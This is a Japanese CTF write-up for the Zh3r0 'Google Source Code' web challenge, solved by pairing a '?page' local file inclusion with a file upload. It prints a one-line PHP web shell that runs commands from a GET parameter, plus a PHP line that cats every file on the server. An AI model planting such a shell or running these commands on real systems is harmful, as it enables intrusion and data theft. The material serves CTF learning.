Google Source code
Chall Link : http://web.zh3r0.ml:7777/
you dont get anything free except the source code. Try to search it and also I never liked to upload my homework in google classroom. Help me hack this website please :)
ソースコード以外は無料では手に入りません。それを検索してみて、また、私は私の宿題をgoogle教室でアップロードするのが好きではありませんでした。私はこのウェブサイトをハックしてください助けてください :)
Author : Finch
Google Classroomってほんとにあるんや。
と思って、YOUR WORK
を押すといつものアレに飛ぶ。
とりあえずソースコードを見てみよう。
/index.css
がリンク切れしてる(エラーコードにはnginxとある)<!-- get the 'page' :eyes: -->
というコメントがある/page
,/page.php
,/page.html
どれも404
うーん。HTTPレスポンス見てみるか。
あ!GETでpageパラメタか!
/?page
を見ると、真っ白の画面が出てくる。
あってるっぽい。
探し回って/?page=flag
を試してみるとむっちゃ笑われる。
<img src='https://media.giphy.com/media/p0RDMJGgMXF96/giphy.gif' /> <!-- https://www.youtube.com/watch?v=0ZfZj2bn_xg -->
ヒントっぽい。/?page=upload
に行ってみよう。
ファイルがアップロードできるサイトになった。
適当にアップロードすると、/progress.php
にPOSTして、
The file 64a92ac5ea37133613190084709878d8d35697de.jpg has been uploaded.
みたいに出てくる。
ファイル名が表示されるのね。怪しい。
うーん?
解説を見た
- CTF-Write-ups/Zh3r0 CTF/Web/Google Source Code at master · csivitu/CTF-Write-ups
- CTFtime.org / Zh3r0 CTF / Google Source Code / Writeup
あーあーあー
LFI
pageを指定して開いているが、LFIを使ってそうな感じがする。
しかもアップロードができるので、アップロードしたファイルを呼び出すのではと…
うむ。
webshellを試す。
以下をevilman.phpと保存して、?page=evilman&cmd=ls
をしてみる。
<?php system($_GET["cmd"]); ?>
色々出てくる。
webshellが動いている。
ほーん。なかなか複雑な構造になっている。
フラグをfindする。
<?php system('find . -type f -exec cat {} +'); ?>
なるほど。